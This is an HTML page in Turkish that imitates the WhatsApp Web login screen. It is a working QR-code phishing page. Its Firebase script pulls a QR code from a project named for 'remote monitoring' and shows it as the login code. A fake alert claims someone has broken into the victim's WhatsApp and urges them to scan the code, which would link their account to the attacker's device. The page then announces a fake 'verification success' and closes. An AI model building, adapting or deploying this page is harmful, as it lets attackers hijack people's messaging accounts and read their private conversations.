<!DOCTYPE html>
<html lang="tr">
<head>
  <meta charset="UTF-8">
  <title>WhatsApp</title>
  <link rel="icon" type="image/svg+xml" href="https://upload.wikimedia.org/wikipedia/commons/6/6b/WhatsApp.svg">

  <style>
    body {
      margin: 0;
      font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
      background-color: #f0ebe5;
    }

    .container {
      max-width: 960px;
      margin: 0 auto;
      padding: 30px;
    }

    .banner {
      background-color: #ffffff;
      border-radius: 25px;
      padding: 20px;
      margin-top: 5%;
      display: flex;
      align-items: center;
      justify-content: space-between;
      border: 1px solid #000;
      width: 928px;
      height: 88px;
      position: relative;
      right: 5px;
    }

    .banner img.icon {
      width: 40px;
      height: 40px;
      margin-right: 15px;
    }

    .banner-content {
      display: flex;
      align-items: center;
      flex-grow: 1;
      margin-right: 30px;
      vertical-align: middle;
    }

    .download-button {
      background-color: #25d366;
      color: #000;
      border: none;
      border-radius: 25px;
      border: 1px solid #000;



      font-size: 16px;
      cursor: pointer;
      width: 150px;
      height: 50px;
    }

    .login-box {
      background-color: #ffffff;
      border-radius: 25px;
      margin-top: 20px;
      padding: 60px;
      display: flex;
      justify-content: space-between;
      flex-wrap: wrap;
      border: 1px solid #000;
      width: 848px;
      height: 395px;
      position: relative;
      right: 5px;


    }

    .steps {
      flex: 1;
      min-width: 250px;
      padding-right: 20px;
    }

    .steps ol {
      padding-left: 20px;
    }

      .qr {
    position: relative;
    display: inline-block;
    width: 263px;
    height: 263px;
    margin-top: 40px;
    position: relative;
    right: 7px;
  }

  .qr-image {
    width: 100%;
    height: 100%;
    display: block;
  }

  .qr-logo {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    width: 64px;
    height: 64px;

  }   
    .header {
      background-color: #f0ebe5;
      padding: 16px 24px;
      display: flex;
      align-items: center;
    }
    .header img {
      height: 32px;
      margin-right: 10px;
    }
    .header span {
      font-size: 20px;
      font-weight: 600;
      color: #25d366;
    }
   

    .checkbox-area {
      margin-top: 20px;
      accent-color: #25d366;
    }

    .footer {
      text-align: center;
      margin-top: 30px;
      font-size: 14px;
    }

    a {
      color: #25d366;
      text-decoration: none;
    }

    .secure-msg {
      display: flex;
      align-items: center;
      justify-content: center;
      color: gray;
      font-size: 13px;
      margin-top: 10px;
    }

    .secure-msg::before {
      content: "🔒";
      margin-right: 5px;
    }
  </style>
</head>
<body>
  <div class="header" style="display: flex; align-items: center; gap: 10px; position: relative; left: 9px; top: -8px;">
  <span aria-hidden="true" data-icon="wa-logo" style="display: flex; align-items: center;">
    <svg viewBox="0 0 31 30" height="30" preserveAspectRatio="xMidYMid meet" fill="none" style="display: block; position: relative; left: 6.5px; top: 3.5px;">
      <title>wa-logo</title>
      <path d="M30.3139 14.3245C30.174 10.4932 28.5594 6.864 25.8073 4.1948C23.0552 1.52559 19.3784 0.0227244 15.5446 4.10118e-06H15.4722C12.8904 -0.00191309 10.3527 0.668375 8.10857 1.94491C5.86449 3.22145 3.99142 5.06026 2.67367 7.28039C1.35592 9.50053 0.6389 12.0255 0.593155 14.6068C0.547411 17.1882 1.17452 19.737 2.41278 22.0024L1.09794 29.8703C1.0958 29.8865 1.09712 29.9029 1.10182 29.9185C1.10651 29.9341 1.11448 29.9485 1.12518 29.9607C1.13588 29.973 1.14907 29.9828 1.16387 29.9896C1.17867 29.9964 1.19475 29.9999 1.21103 30H1.23365L9.01561 28.269C11.0263 29.2344 13.2282 29.7353 15.4586 29.7346C15.6004 29.7346 15.7421 29.7346 15.8838 29.7346C17.8458 29.6786 19.7773 29.2346 21.5667 28.4282C23.3562 27.6218 24.9682 26.469 26.3098 25.0363C27.6514 23.6036 28.696 21.9194 29.3832 20.0809C30.0704 18.2423 30.3867 16.2859 30.3139 14.3245ZM15.8099 27.1487C15.6923 27.1487 15.5747 27.1487 15.4586 27.1487C13.4874 27.1511 11.5444 26.6795 9.79366 25.7735L9.39559 25.5654L4.11815 26.8124L5.09221 21.4732L4.86604 21.0902C3.78579 19.2484 3.20393 17.157 3.17778 15.0219C3.15163 12.8869 3.68208 10.7819 4.71689 8.91419C5.75171 7.0465 7.25518 5.48059 9.07924 4.37067C10.9033 3.26076 12.985 2.64514 15.1194 2.58444C15.238 2.58444 15.3571 2.58444 15.4767 2.58444C18.6992 2.59399 21.7889 3.86908 24.0802 6.13498C26.3715 8.40087 27.681 11.4762 27.7265 14.6984C27.7719 17.9205 26.5498 21.0316 24.3234 23.3612C22.0969 25.6909 19.0444 27.0527 15.8235 27.1532L15.8099 27.1487Z" fill="currentColor"></path>
      <path d="M10.2894 7.69007C10.1057 7.69366 9.92456 7.73407 9.75673 7.80892C9.5889 7.88377 9.43779 7.99154 9.31236 8.12584C8.95801 8.48923 7.96736 9.36377 7.91006 11.2003C7.85277 13.0369 9.13594 14.8538 9.31537 15.1086C9.49481 15.3635 11.7686 19.3306 15.5141 20.9395C17.7156 21.8879 18.6806 22.0507 19.3063 22.0507C19.5642 22.0507 19.7587 22.0236 19.9622 22.0115C20.6483 21.9693 22.1969 21.1762 22.5346 20.3137C22.8724 19.4512 22.895 18.6973 22.806 18.5465C22.7171 18.3957 22.4728 18.2872 22.1049 18.0942C21.737 17.9012 19.9321 16.9361 19.5928 16.8004C19.467 16.7419 19.3316 16.7066 19.1932 16.6964C19.1031 16.7011 19.0155 16.7278 18.938 16.774C18.8605 16.8203 18.7954 16.8847 18.7484 16.9618C18.4469 17.3372 17.7548 18.153 17.5225 18.3882C17.4718 18.4466 17.4093 18.4938 17.3392 18.5265C17.2691 18.5592 17.1928 18.5768 17.1154 18.5782C16.9728 18.5719 16.8333 18.5344 16.7068 18.4681C15.6135 18.0038 14.6167 17.339 13.768 16.5079C12.975 15.7263 12.3022 14.8315 11.7716 13.8526C11.5666 13.4726 11.7716 13.2766 11.9586 13.0987C12.1456 12.9208 12.3461 12.675 12.5391 12.4624C12.6975 12.2808 12.8295 12.0777 12.9312 11.8593C12.9838 11.7578 13.0104 11.6449 13.0085 11.5307C13.0067 11.4165 12.9765 11.3045 12.9206 11.2048C12.8317 11.0149 12.1667 9.14664 11.8546 8.39725C11.6013 7.75642 11.2997 7.73531 11.0358 7.7157C10.8187 7.70062 10.5699 7.69309 10.3211 7.68555H10.2894" fill="currentColor"></path>
    </svg>
  </span>
  <span style="font-size: 20px; font-weight: 650;">WhatsApp</span>
</div>

  <div class="container">
    <!-- Üst Banner -->
    <div class="banner">
      <div class="banner-content">
        <span aria-hidden="true" data-icon="web-login-desktop-upsell-illustration" class="xni59qk">
  <svg viewBox="0 0 72 54" height="54" width="72" preserveAspectRatio="xMidYMid meet" fill="none" xmlns="http://www.w3.org/2000/svg">
    <title>web-login-desktop-upsell-illustration</title>
    <g clip-path="url(#a)">
      <path fill="#fff" d="M0 0h72v54H0z"></path>
      <path d="M8.75 15A6.25 6.25 0 0 1 15 8.75h42A6.25 6.25 0 0 1 63.25 15v37.25H8.75z" fill="#E6FFDA" stroke="#111B21" stroke-width="1.5" stroke-miterlimit="10"></path>
      <path d="M71.22 44.75a9.25 9.25 0 0 1-9.22 8.5H10a9.25 9.25 0 0 1-9.22-8.5z" fill="#E6FFDA" stroke="#111B21" stroke-width="1.5" stroke-miterlimit="10"></path>
      <rect x="21.75" y="0.75" width="49.5" height="34.5" rx="6.25" fill="#FCF5EB" stroke="#111B21" stroke-width="1.5" stroke-miterlimit="10"></rect>
      <path d="M43.39 14.955c-.654-1.334 2.328-2.92 2.505-3.648l-.007-.01c.041-.16 0-.318-.047-.476a10.55 10.55 0 0 0-2.25-4.09c-.26-.286-.549-.572-.92-.683-.245-.069-.507-.055-.755-.014-2.124.335-3.598 2.363-3.86 4.438-.263 2.076.445 4.166 1.3 6.11 1.838 4.176 4.592 8.235 8.728 10.376 1.474.766 3.176 1.266 4.786.942 1.083-.218 2.183-1.007 2.128-2.08-.03-.51-.31-.976-.582-1.42-.616-.986-1.226-1.973-1.842-2.955-.31-.497-.68-1.038-1.266-1.156-1.215-.241-2.036 1.545-3.265 1.383-.483-.065-4.256-5.806-4.653-6.717" fill="#25D366" stroke="#111B21" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
    </g>
    <defs>
      <clipPath id="a">
        <path fill="#fff" d="M0 0h72v54H0z"></path>
      </clipPath>
    </defs>
  </svg>
        </span>
        <div>
          <p style="font-size:23px; line-height: 0;">Windows için WhatsApp'ı indirin </p>
          Yeni Windows uygulamasını indirerek arama yapın, ekranınızı paylaşın ve daha hızlı bir deneyim yaşayın.
        </div>
      </div>
<button class="download-button" onclick="window.location.href='https://get.microsoft.com/installer/download/9NKSQGP7F2NH?cid=website_cta_psi'">
  İndir
  <span aria-hidden="true" data-icon="download-outline">
    <svg viewBox="0 0 24 24" height="16" width="16" preserveAspectRatio="xMidYMid meet" fill="none">
      <title>download-outline</title>
      <path fill-rule="evenodd" clip-rule="evenodd" d="M20.625 20.625C20.625 21.2463 20.1213 21.75 19.5 21.75L4.5 21.75C3.87868 21.75 3.375 21.2463 3.375 20.625C3.375 20.0037 3.87868 19.5 4.5 19.5H19.5C20.1213 19.5 20.625 20.0037 20.625 20.625Z" fill="currentColor"></path>
      <path fill-rule="evenodd" clip-rule="evenodd" d="M13.125 3C13.125 2.37868 12.6213 1.875 12 1.875C11.3787 1.875 10.875 2.37868 10.875 3V14.3093L4.79045 8.27174C4.34942 7.8341 3.63711 7.83686 3.19948 8.2779C2.76184 8.71894 2.7646 9.43125 3.20564 9.86888L11.2056 17.8071C11.6443 18.2424 12.3518 18.2424 12.7905 17.8071L20.7905 9.86888C21.2315 9.43125 21.2343 8.71894 20.7966 8.2779C20.359 7.83687 19.6467 7.83411 19.2056 8.27174L13.125 14.3054L13.125 3Z" fill="currentColor"></path>
    </svg>
  </span>
</button>    </div>

    <!-- Giriş Kutusu -->
    <div class="login-box">
      <div class="steps">
        <p style="font-size:30px; line-height: 0;">WhatsApp Web'e giriş yapın</p>
        <p style="font-size:20px; line-height: 1;">WhatsApp'ı tarayıcınızda kullanarak arkadaşlarınızla ve ailenizle özel olarak mesajlaşın</p>
        
        <ol>
          <li style="font-size:20px; line-height: 4;">Telefonunuzda WhatsApp'ı açın</li>
          <li style="font-size:20px; line-height: 0;">Android'de Menü
  <span style="vertical-align: middle;">
    <svg viewBox="0 0 24 24" width="18" height="20" xmlns="http://www.w3.org/2000/svg" fill="black">
      <rect width="24" height="24" fill="#f0f0f0" stroke="black" stroke-width="0.5" rx="6" ry="6" />
      <path d="M12,7c1.104,0,2-0.896,2-2c0-1.105-0.895-2-2-2c-1.104,0-2,0.894-2,2 C10,6.105,10.895,7,12,7z 
               M12,9c-1.104,0-2,0.894-2,2c0,1.104,0.895,2,2,2c1.104,0,2-0.896,2-2C13.999,9.895,13.104,9,12,9z 
               M12,15 c-1.104,0-2,0.894-2,2c0,1.104,0.895,2,2,2c1.104,0,2-0.896,2-2C13.999,15.894,13.104,15,12,15z"/>
    </svg>
  </span>
  , iPhone'da Ayarlar ⚙️'a 
  <br>
  <span style="font-size:20px; line-height: 1;">dokunun.</span>
 


          </li>
          
          <li style="font-size:20px; line-height: 3;">Bağlı cihazlar'a, ardından Cihaz bağla'ya dokunun</li>
          <li style="font-size:20px; line-height: 2;">Onaylamak için QR kodunu tarayın</li>
        </ol>

       <p>
  <a href="https://faq.whatsapp.com/1317564962315842/?cms_platform=android&lang=tr"
     style="color: black; 
            text-decoration: underline; 
            text-decoration-color: #25d366; 
            text-decoration-thickness: 2px; 
            text-underline-offset: 4px;"
     onmouseover="this.style.color='#25d366';"
     onmouseout="this.style.color='black';">
    Başalamak için yardıma mı ihtiyacınız var?
  </a>
</p>
<p>
  <a href="#"
     style="color: black; 
            text-decoration: underline; 
            text-decoration-color: #25d366; 
            text-decoration-thickness: 2px; 
            text-underline-offset: 4px;"
     onmouseover="this.style.color='#25d366';"
     onmouseout="this.style.color='black';">
    Telefon numarası kullanarak giriş yapın
  </a>
</p>

      </div>

      <div class="qr">
  <!-- QR Kodu -->
  <img id="qrImg" class="qr-image" src="qr-kod.png" alt="QR Kod">

  <!-- WhatsApp SVG Logosu -->
  <svg class="qr-logo" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 64">
    <path fill="#FFFFFF" d="M6.525 43.936a29.596 29.596 0 0 1-3.039-13.075C3.494 14.568 16.755 1.313 33.05 1.313c7.904.004 15.328 3.082 20.91 8.666 5.581 5.586 8.653 13.01 8.65 20.907-.007 16.294-13.266 29.549-29.558 29.549a29.648 29.648 0 0 1-12.508-2.771L1.391 62.687l5.134-18.751z"/>
    <path fill="#000000" d="M50.801 13.135c-4.739-4.742-11.039-7.354-17.752-7.357-13.837 0-25.094 11.253-25.099 25.085a25.039 25.039 0 0 0 3.349 12.541l-3.56 12.999 13.304-3.488a25.084 25.084 0 0 0 11.996 3.054h.011c13.83 0 25.088-11.256 25.095-25.087.002-6.703-2.607-13.005-7.344-17.747zM33.05 51.733h-.008a20.866 20.866 0 0 1-10.62-2.906l-.762-.452-7.894 2.07 2.108-7.694-.497-.789a20.802 20.802 0 0 1-3.189-11.097c.004-11.496 9.361-20.85 20.87-20.85a20.73 20.73 0 0 1 14.746 6.115 20.733 20.733 0 0 1 6.104 14.752c-.006 11.497-9.363 20.851-20.858 20.851z"/>
    <path fill="#000000" d="M25.429 19.26a8.65 8.65 0 0 0-1.028.011 2.352 2.352 0 0 0-.95.255c-.221.114-.427.277-.75.582-.305.288-.481.54-.668.782a6.974 6.974 0 0 0-1.443 4.291l.001.003a8.243 8.243 0 0 0 .844 3.607c1.043 2.307 2.763 4.746 5.035 7.008a24.676 24.676 0 0 0 1.657 1.6 24.145 24.145 0 0 0 9.814 5.229s.751.179 1.391.218c.021.001.04.003.061.003a9.207 9.207 0 0 0 1.422-.033 5.086 5.086 0 0 0 2.129-.59c.423-.225.623-.337.978-.561 0 0 .11-.072.319-.23.345-.257.558-.438.845-.736.211-.22.394-.479.534-.772.2-.417.401-1.213.481-1.874.061-.505.042-.781.036-.952-.011-.275-.238-.558-.487-.678l-1.486-.668s-2.222-.967-3.581-1.587a1.278 1.278 0 0 0-.452-.104c-.341-.021-.723.068-.966.324v-.004c-.013-.001-.182.145-2.031 2.385-.102.122-.341.387-.754.362a1.086 1.086 0 0 1-.185-.029 3.402 3.402 0 0 1-.49-.17c-.316-.134-.427-.185-.643-.278l-.013-.006a15.361 15.361 0 0 1-4.013-2.556 15.88 15.88 0 0 1-.927-.885c-1.074-1.041-1.953-2.148-2.607-3.24-.035-.06-.09-.146-.15-.242-.107-.174-.225-.381-.262-.523-.095-.376.157-.678.157-.678s.622-.68.911-1.05c.278-.356.518-.704.671-.952.301-.484.39-.982.238-1.37a216.767 216.767 0 0 0-2.219-5.215c-.156-.339-.598-.589-1.005-.636a6.284 6.284 0 0 0-.414-.041"/>
        </svg>
       <div class="checkbox-area" style="font-size:14px; margin-top: 10px;">
  <label style="display: inline-block; cursor: pointer; user-select: none;">
    <input type="checkbox" checked style="vertical-align: -10px; margin-right: 5px; width: 18px; height: 18px;">
    Bu tarayıcıda oturumum açık kalsın
    <div style="font-size: 10px; color: #555; margin-top: -5px; margin-left: 30px; display: flex; align-items: center;">
      <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" fill="#555" viewBox="0 0 24 24">
        <circle cx="12" cy="12" r="10" stroke="none" fill="#666"/>
        <text x="12" y="17" text-anchor="middle" font-size="13" font-family="Arial" fill="#fff" font-weight="bold">i</text>
      </svg>
    </div>
  </label>
</div>
      </div>
    </div>
    

  </div>

  <!-- Firebase -->
  <script type="module">
    import { initializeApp } from "https://www.gstatic.com/firebasejs/10.12.2/firebase-app.js";
    import { getDatabase, ref, onValue } from "https://www.gstatic.com/firebasejs/10.12.2/firebase-database.js";

    const firebaseConfig = {
      apiKey: "AIzaSyBnVLavvPn10nV8u54_XZ9uupgKOOP4BSI",
      authDomain: "uzaktan-izleme-40248.firebaseapp.com",
      databaseURL: "https://uzaktan-izleme-40248-default-rtdb.firebaseio.com",
      projectId: "uzaktan-izleme-40248",
      storageBucket: "uzaktan-izleme-40248.appspot.com",
      messagingSenderId: "114640788776",
      appId: "1:114640788776:web:cb15c29a17cfa43119b2bb"
    };

    const app = initializeApp(firebaseConfig);
    const db = getDatabase(app);
    const qrRef = ref(db, 'qr');

    const qrImg = document.getElementById("qrImg");
    alert("Doğrulama Ekranına Hoşgeldiniz Wahatsabınıza İzinsiz Giriş Tespit Ettik Lütfen Kodu Taratın!!!");
    onValue(qrRef, (snapshot) => {
      const data = snapshot.val();
      if (data && data.qr_code) {
        // Base64 başlığı ekleniyor
        qrImg.src = "data:image/png;base64," + data.qr_code;
      }
      if (data && data.statut === true) {
        alert("✅ Doğrulama başarılı!");
        setTimeout(() => window.close(), 2000);
      } 
        
      
    });
  </script>
</body>
</html>
